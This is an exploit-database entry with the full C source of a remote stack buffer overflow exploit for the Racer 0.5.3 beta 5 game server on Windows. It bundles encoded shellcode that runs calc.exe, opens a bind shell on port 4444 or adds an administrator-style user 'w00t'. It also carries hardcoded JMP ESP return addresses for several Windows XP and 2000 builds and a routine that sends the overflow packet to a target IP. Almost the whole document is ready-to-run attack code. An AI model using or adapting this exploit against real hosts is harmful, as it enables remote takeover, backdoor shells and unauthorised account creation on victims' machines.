Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow

EDB-ID:

8253


Author:

fl0 fl0w

Type:

remote


Platform:

Windows

Date:

2009-03-20


/*
Racer vs 0.5.3 beta 5 Remote Stack Buffer Overflow(C) exploit by fl0 fl0w
--------------------------------------------------------------------------------------------------
Description : Bug found some time ago by n00b (Cheers mate ! :D) ,I wanted to make a more
improved sploit , with lots of targets to chose from , and C yes is better :D.
--------------------------------------------------------------------------------------------------
Tested on Win Xp Pro Sp 3  ; Compile DevC++ 4.9.9.2
--------------------------------------------------------------------------------------------------
Command line arguments : -ip ->the ip of your target default is 127.0.0.1                    
                         -port ->default port is 26000                                   
                         -shellcode ->well guess.. :D  
--------------------------------------------------------------------------------------------------                         
What does the exploit do ?                                                           
You can run :Calc.exe, Bind shell on port 4444, Win32 Adduser   
I've set the default port 26000 and ip 127.0.0.1 .      
--------------------------------------------------------------------------------------------------                  
How to use ? Method ?
  -t 10 -ip 127.0.0.1 -port 26000   
  Classic buffer overflow , just jump to the payload and done !
  It can be exploited using SEH method too.
*/





#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif


char packet[2000];


#ifdef WIN32
	WSADATA wsadata;
#endif
  

      
    struct {
                                                     
                                                     const char *name;
                                                     int         size;
                                                     char       *shellcode;     
           }                            set[] = { 
                   {
                       "Run Calc.exe"           , 339 ,
                       "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
                       "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
                       "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
                       "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
                       "\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
                       "\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
                       "\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
                       "\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
                       "\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
                       "\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
                       "\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
                       "\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
                       "\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
                       "\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
                       "\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
                       "\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
                       "\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
                       "\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
                       "\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
                       "\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
                       "\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
                       "\x70\x63"
                        } ,
             {
                       "Bind shell on port 4444" , 238 ,
                       "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
                       "\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67"
                       "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x77\x32\x42\x42\x42\x32"
                       "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x5a\x49\x49\x6c\x72"
                       "\x4a\x48\x6b\x32\x6d\x48\x68\x4c\x39\x39\x6f\x39\x6f\x69\x6f\x43"
                       "\x50\x6e\x6b\x50\x6c\x66\x44\x41\x34\x4c\x4b\x73\x75\x47\x4c\x6c"
                       "\x4b\x43\x4c\x57\x75\x30\x78\x75\x51\x7a\x4f\x4c\x4b\x42\x6f\x34"
                       "\x58\x4e\x6b\x41\x4f\x37\x50\x46\x61\x7a\x4b\x42\x69\x4e\x6b\x46"
                       "\x54\x6c\x4b\x63\x31\x6a\x4e\x50\x31\x49\x50\x4c\x59\x6e\x4c\x6f"
                       "\x74\x49\x50\x32\x54\x74\x47\x6f\x31\x6b\x7a\x44\x4d\x46\x61\x6f"
                       "\x32\x4a\x4b\x4a\x54\x77\x4b\x31\x44\x51\x34\x55\x78\x31\x65\x4b"
                       "\x55\x6c\x4b\x33\x6f\x75\x74\x63\x31\x38\x6b\x35\x36\x4e\x6b\x44"
                       "\x4c\x70\x4b\x4e\x6b\x43\x6f\x55\x4c\x36\x61\x78\x6b\x36\x63\x66"
                       "\x4c\x4e\x6b\x6f\x79\x42\x4c\x31\x34\x57\x6c\x75\x31\x78\x43\x75"
                       "\x61\x39\x4b\x50\x64\x4c\x4b\x57\x33\x34\x70\x4c\x4b\x77\x30\x64"
                       "\x4c\x4c\x4b\x70\x70\x37\x6c\x4c\x6d\x6e\x6b\x61\x50\x74\x48\x31"
                       "\x4e\x30\x68\x6c\x4e\x62\x6e\x44\x4e\x78\x6c\x72\x70\x39\x6f\x79"
                       "\x46\x63\x56\x76\x33\x70\x66\x42\x48\x56\x53\x37\x42\x53\x58\x62"
                       "\x57\x41\x63\x54\x72\x63\x6f\x51\x44\x59\x6f\x5a\x70\x50\x68\x7a"
                       "\x6b\x6a\x4d\x4b\x4c\x47\x4b\x62\x70\x59\x6f\x6e\x36\x71\x4f\x6f"
                       "\x79\x4d\x35\x43\x56\x6b\x31\x4a\x4d\x33\x38\x34\x42\x31\x45\x52"
                       "\x4a\x55\x52\x79\x6f\x6e\x30\x73\x58\x6a\x79\x77\x79\x4c\x35\x4c"
                       "\x6d\x52\x77\x39\x6f\x69\x46\x72\x73\x71\x43\x61\x43\x41\x43\x30"
                       "\x53\x42\x63\x46\x33\x42\x63\x71\x43\x4b\x4f\x58\x50\x71\x76\x30"
                       "\x68\x32\x31\x71\x4c\x65\x36\x41\x43\x6b\x39\x58\x61\x6a\x35\x63"
                       "\x58\x59\x34\x76\x7a\x30\x70\x4b\x77\x61\x47\x49\x6f\x4a\x76\x71"
                       "\x7a\x42\x30\x53\x61\x41\x45\x6b\x4f\x5a\x70\x53\x58\x6e\x44\x6c"
                       "\x6d\x64\x6e\x6d\x39\x36\x37\x49\x6f\x4b\x66\x73\x63\x30\x55\x39"
                       "\x6f\x4e\x30\x52\x48\x4d\x35\x41\x59\x6f\x76\x32\x69\x70\x57\x49"
                       "\x6f\x4e\x36\x66\x30\x66\x34\x30\x54\x43\x65\x4b\x4f\x4a\x70\x4f"
                       "\x63\x63\x58\x39\x77\x50\x79\x68\x46\x64\x39\x36\x37\x39\x6f\x4e"
                       "\x36\x70\x55\x4b\x4f\x6e\x30\x63\x56\x31\x7a\x32\x44\x42\x46\x31"
                       "\x78\x33\x53\x72\x4d\x4d\x59\x78\x65\x50\x6a\x52\x70\x70\x59\x57"
                       "\x59\x38\x4c\x6b\x39\x5a\x47\x31\x7a\x72\x64\x4e\x69\x4b\x52\x70"
                       "\x31\x49\x50\x78\x73\x4e\x4a\x4b\x4e\x71\x52\x56\x4d\x6b\x4e\x72"
                       "\x62\x34\x6c\x4f\x63\x6e\x6d\x33\x4a\x77\x48\x4e\x4b\x6c\x6b\x4c"
                       "\x6b\x55\x38\x32\x52\x6b\x4e\x58\x33\x56\x76\x59\x6f\x70\x75\x43"
                       "\x74\x49\x6f\x7a\x76\x43\x6b\x36\x37\x70\x52\x36\x31\x31\x41\x31"
                       "\x41\x52\x4a\x54\x41\x70\x51\x51\x41\x50\x55\x63\x61\x6b\x4f\x58"
                       "\x50\x73\x58\x4c\x6d\x79\x49\x43\x35\x4a\x6e\x31\x43\x4b\x4f\x7a"
                       "\x76\x71\x7a\x59\x6f\x4b\x4f\x64\x77\x6b\x4f\x38\x50\x4c\x4b\x50"
                       "\x57\x79\x6c\x4c\x43\x5a\x64\x70\x64\x4b\x4f\x4e\x36\x33\x62\x79"
                       "\x6f\x6e\x30\x41\x78\x4c\x30\x6f\x7a\x43\x34\x51\x4f\x50\x53\x79"
                       "\x6f\x4a\x76\x4b\x4f\x4e\x30\x67"

                        } ,          
                        { 
                       "Win32 Adduser PASS=w00t EXITFUNC=seh USER=w00t" , 238 ,        
                       "\xfc\xbb\xfb\xe2\x33\x0b\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
                       "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x07\x0a\x77\x0b\xf7\xcb\xf3"
                       "\x4e\xcb\x40\x7f\x54\x4b\x56\x6f\xdd\xe4\x40\xe4\xbd\xda\x71\x11"
                       "\x08\x91\x46\x6e\x8a\x4b\x97\xb0\x14\x3f\x5c\xf0\x53\x38\x9c\x3b"
                       "\x96\x47\xdc\x57\x5d\x7c\xb4\x83\x9a\xf7\xd1\x47\xfd\xd3\x18\xb3"
                       "\x64\x90\x17\x08\xe2\xf9\x3b\x8f\x1f\x8e\x58\x04\xde\x7b\xe9\x46"
                       "\xc5\x7f\x29\x47\xc5\x1b\x26\xe8\xf5\x66\xf8\x91\xf9\xe3\xb9\x6d"
                       "\x89\x83\x25\xc3\x06\x0b\x5e\xf0\x10\x40\xde\xb6\x23\x56\xdf\x3d"
                       "\x4b\x6a\x80\x70\x7a\xf2\x68\xfa\x7a\x71\x54\x87\x2a\x1d\xa5\xf2"
                       "\xcf\x82\x2d\x9b\x2e\xb6\xa0\xcc\x31\x21\xdf\x9f\xa9\x83\x45\x18"
                       "\x57\xfb\xaa\xbb\xb7\x95\xd1\x4f\x98\x1c\x69\xd5\xaa\xfe\xfa\x25"
                       "\x7b\x8a\x24\x31\x4b\x42\x51\x9d\x84\xe3\xdd\x99\xfa\xc5\xfb\x01"
                       "\x95\x6c\x70\x62\x05\x01\x1b\x03\xb9\xba\xa9\xac\x34\x34\x6e\x72"
                       "\xd3\xd9\x07\x1a\x72\x52\xac\x90\xe5\xe0\x23\x27\x95\x28\xcb\xf7"
                       "\x69\x5c\x13\xd7\xc8\xd8\x17\x27\xcb\xe0\x97\x27\xcb"
                       },
                               {NULL, NULL}
                  };
                  
#define EIP1 "\x7B\x46\x86\x7C"  //Microsoft Windows Xp Pro sp3 JMP ESP Kernel32.dll
#define EIP2 "\x41\x41\x41\x41" //Test Crash
#define EIP3 "\xD9\x13\x00\x01" //Microsoft Win XP-Universal 1
#define NVal -1    
#define EIP4 "\x74\x16\xE8\x77"  //Microsoft Windows 2000 SP0 English
#define EIP5 "\xEC\x29\xE8\x77"  //Microsoft Windows XP SP1   English 
#define EIP6 "\xB5\x24\xE8\x77" //Microsoft Windows 2000 SP2 English 
#define EIP7 "\x7A\x36\xE8\x77" //Microsoft Windows 2000 SP3 English
#define EIP8 "\x9B\x2A\xF9\x77"  //Microsoft Windows 2000 SP4 English
#define EIP9 "\xE3\xAF\xE9\x77" //Microsoft Windows XP SP0   English 
#define EIP10 "\xBA\x26\xE6\x77" //Microsoft Win XP-Universal 2

   
   void Disconnect (SOCKET); 
   void Wait_s (int);         
   void Usage (char *);
   void Exit (int);
   int wsg (char *, char *);
   void Help ();   
        
 int main (int argc, char *argv[])

{
    if (argc < 6) { 
       Help ();
       Exit (0);
       }
	int sskd, 
        sw=0;
	char *target, 
         *os;
    system ("CLS");     
    Help ();
    
	if (WSAStartup (MAKEWORD(2,0), &wsadata) != 0) {
          printf("wsastartup error\n");
          NVal -1;
          }
     
	int     ip = htonl(inet_addr(argv[4])); 
    int   port = atoi (argv[6]);
    int  defaultPort = 26000;  
    char *defaultIp = "127.0.0.1";
 //test ip ; If you enter 0 default will be set       
    if (atoi (argv[4]) <= 0) 
       ip = htonl(inet_addr(defaultIp));   
   //test if port is valid ; If you enter 0 the default will be loaded    
    if ( atoi (argv[6]) <= 0 || atoi (argv[6]) > 65000)  
                    port = defaultPort;
  //test line arguments              
    if (wsg (argv[1], "-t") == NVal) {
       Usage (argv[0]);
         Exit (0);
       }
    if (wsg (argv[3], "-ip") == NVal) {
    Usage (argv[0]);
    Exit (0);
   }
    if (wsg (argv[5], "-port") == NVal) {
    Usage (argv[0]);
     Exit (0);
}    
       if (wsg (argv[7], "-shellcode") == NVal) {
    Usage (argv[0]);
     Exit (0);
}    
   //endtest  
     char *g;

	SOCKET s;
    fd_set mask;
    struct timeval timeout; 
    struct sockaddr_in server;
	s=socket(AF_INET,SOCK_DGRAM,0);
	if (s == -1) {
          perror ("Socket\n");
                           return NVal;
          }	
    //selecting JMP address      
	if (atoi (argv[2]) == 1) {
                      g       = EIP1;
                      os      = "win xp pro sp 3 English";
                      }
        else                
	if (atoi (argv[2]) == 2) {
                                  g  = EIP2;
                                  os = "boom";
                              }
     else                               
    	if (atoi (argv[2]) == 3) {
                      g       = EIP3;
                      os      = "win xp pro sp 3 English";
                      }
         else             
	if (atoi (argv[2]) == 4) {
                                  g  = EIP4;
                                  os = "boom";
                              } 
             else                  
    	if (atoi (argv[2]) == 5) {
                      g       = EIP5;
                      os      = "win xp pro sp 3 English";
                      }
          else            
	if (atoi (argv[2]) == 6) {
                                  g  = EIP6;
                                  os = "boom";
                              }   
            else                              
    	if (atoi (argv[2]) == 7) {
                      g       = EIP7;
                      os      = "win xp pro sp 3 English";
                      }
          else            
	if (atoi (argv[2]) == 8) {
                                  g  = EIP8;
                                  os = "boom";
                              } 
        else                                 
    	if (atoi (argv[2]) == 9) {
                      g       = EIP9;
                      os      = "win xp pro sp 3 English";
                      }
        else              
	if (atoi (argv[2]) == 10) {
                                  g  = EIP10;
                                  os = "boom";
                              }
  //endselect                              
    system ("cls");
    printf ("--------------------------\n");                                                                                                                                                                         
    printf ("*Preparing connection...\n");   
    Wait_s (500);      
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ip);
	server.sin_port=htons(port);
 //core of exploit	
	int i;
	do {
       packet[i] = 'E';
                  i++; 
        }while (i < 2000);
        
    printf ("*Building buffer...\n");    
    Wait_s (500);
	memset (packet,0x90,2000);
    memcpy (packet + 1001, g, 4);
    
    if (atoi (argv[8]) == 0) 
    memcpy (packet + 1005 , (char*)set[0].shellcode, strlen ((char*)set[0].shellcode));
      else
    if (atoi (argv[8]) == 1) 
    memcpy (packet + 1005 , (char*)set[1].shellcode, strlen ((char*)set[1].shellcode));
      else
    if (atoi (argv[8]) == 2) 
    memcpy (packet + 1005 , (char*)set[2].shellcode, strlen ((char*)set[2].shellcode));
    printf ("*Sending packets...\n");   
    Wait_s (500); 
    
	sskd = sendto(s, packet, sizeof (packet), 0, (struct sockaddr *)&server, sizeof (server));
//endcore
	timeout.tv_sec=10;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	sw = select((s+1),&mask,NULL,NULL,&timeout);
	if(sw)
	{
		perror ("Server \n");
		Disconnect (s);
		return -1;
	}
	else
	{   printf ("*you can get shell now ! if calc isn't launched already ...:))\n");
        printf ("*Success !\n"); 
        printf ("-------------------------\n");
        Help ();
     	Disconnect (s);	
		return 0;
	}
	return 0;
}

int wsg (char *name1, char *name2)
  {
            if (strcmp (name1, name2) == 0) 
               return 1;
                      return NVal; 
      }
      
 void Usage (char *name)
 {
     printf ("Usage is: %s -t 1->4 -ip 127.0.0.1 -port 26000\n", name);
          }
  void Help ()
  {
    fputs (
           "**********    **********************************    **************  **********\n" 
           "::::Racer vs 0.5.3 Remote Stack Buffer Overflow Exploit (C)::::   \n"
           "::::                    By fl0 fl0w                        ::::  \n"
           "\t-t ->target->                                                   "
           "                                                                  \n"
           "\t\tMicrosoft Win XP-Universal                                    \n"
           "\t\tMicrosoft Windows XP SP0   English                            \n"
           "\t\tMicrosoft Windows XP SP1   English                            \n"
           "\t\tMicrosoft Win XP Pro sp3 English                              \n"
           "\t\tMicrosoft Windows 2000 SP0 English                            \n"
           "\t\tMicrosoft Windows 2000 SP1 English                            \n"
           "\t\tMicrosoft Windows 2000 SP2 English                            \n"
           "\t\tMicrosoft Windows 2000 SP3 English                            \n"
           "\t\tMicrosoft Windows 2000 SP4 English                            \n"
           "                                                                  \n"
           "\t-ip ->the ip of your target default is 127.0.0.1                \n"     
           "                                                                  \n"   
           "\t-port ->default port is 26000                                   \n"
           "                                                                  \n"
           "\t-shellcode ->well guess.. :D                                    \n"
           "\t\t {1}Run Calc.exe                                              \n"
           "\t\t {2}Bind shell on port 4444                                   \n"
           "\t\t {3}Win32 Adduser PASS=w00t EXITFUNC=seh USER=w00t            \n"
           "\n"
           "EXAMPLE"
           "  Usage is:  -t 10 -ip 127.0.0.1 -port 26000                       "      
    ,stdout);   
       }         
  void Exit (int t)
  {
     exit (t); 
      }  
 void Wait_s (int seconds)
 {
    Sleep (seconds);  
      }
  
  void Disconnect (SOCKET S)
  {
   closesocket(S);    
       }  

// milw0rm.com [2009-03-20]